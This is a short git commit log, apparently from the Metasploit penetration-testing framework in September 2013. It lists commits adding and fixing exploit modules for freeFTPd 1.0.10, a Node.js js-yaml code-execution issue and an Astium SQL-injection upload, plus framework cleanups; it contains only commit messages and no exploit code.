TecR0c a6e1bc61ec updated version in exploit freeFTPd 1.0.10 2013-09-27 11:27:51 +10:00
TecR0c 3a3f1c0d05 updated requested comments for freeFTPd 1.0.10 2013-09-27 11:13:28 +10:00
Meatballs 3d812742f1 Merge upstream master 2013-09-26 21:27:44 +01:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
jvazquez-r7 813bd2c9a5
Land #2379, @xistence's exploit for OSVDB 88860 2013-09-26 13:52:15 -05:00
Meatballs a25833e4d7 Fix %TEMP% path 2013-09-26 19:22:36 +01:00
William Vu acb2a3490c Land #2419, nodejs_js_yaml_load_code_exec info 2013-09-26 12:55:48 -05:00
Tod Beardsley 8696b5d2dc
Fix bug on missing hosts for SunRPC Portmap
Also cleans up and normalizes the print messages to follow the
conventions of "host:port - proto - message"

[FixRM #8409], reported by Chris F.
2013-09-26 09:42:38 -05:00
jvazquez-r7 b618c40ceb Fix English 2013-09-26 09:00:41 -05:00
TecR0c 0339c3ef48 added freeFTPd 1.0.10 (PASS Command) 2013-09-26 20:37:23 +10:00
xistence c2ff5accee stability fixes to astium_sqli_upload 2013-09-26 10:23:33 +07:00
FireFart 09fa7b7692 remove rport methods since it is already defined in Msf::Exploit::Remote::HttpClient 2013-09-25 23:50:34 +02:00
FireFart 84ec2cbf11 remove peer methods since it is already defined in Msf::Exploit::Remote::HttpClient 2013-09-25 23:42:44 +02:00
jvazquez-r7 58d4096e0f Resolv conflicts on #2267 2013-09-25 13:06:14 -05:00
jvazquez-r7 ff610dc752 Add vulnerability discoverer as author 2013-09-25 12:45:54 -05:00
jvazquez-r7 5c88ad41a8 Beautify nodejs_js_yaml_load_code_exec metadata 2013-09-25 12:44:34 -05:00